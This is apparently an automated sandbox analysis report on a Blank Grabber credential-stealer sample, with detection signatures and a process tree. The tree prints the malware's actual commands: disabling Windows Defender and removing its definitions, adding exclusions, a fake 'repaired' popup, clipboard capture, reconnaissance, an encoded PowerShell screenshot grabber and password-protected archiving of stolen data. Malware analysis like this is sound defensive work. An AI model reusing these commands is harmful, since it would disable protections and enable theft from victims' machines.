Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cmd.exe

Overview

General Information

Sample name:cmd.exe
Analysis ID:1561562
MD5:b2fe874c2e11c56edf05c5250a8c966f
SHA1:06d6e28c3cb46e06195a5f8c360d8eeaddfb1c06
SHA256:255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f
Tags:exeuser-JaffaCakes118
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\cmd.exe" MD5: B2FE874C2E11C56EDF05C5250A8C966F)
    • cmd.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\cmd.exe" MD5: B2FE874C2E11C56EDF05C5250A8C966F)
      • cmd.exe (PID: 7332 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7560 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7340 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7484 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 4476 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7516 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7536 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8032 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8008 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3636 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2540 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6552 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8108 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2936 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1908 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7888 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 2188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8276 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8300 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8540 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8688 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8396 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8444 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8476 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8552 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8600 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8672 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8772 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8828 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8852 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8904 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9148 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 9204 cmdline: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7700 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7844 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8160 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1076 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2008 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8396 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
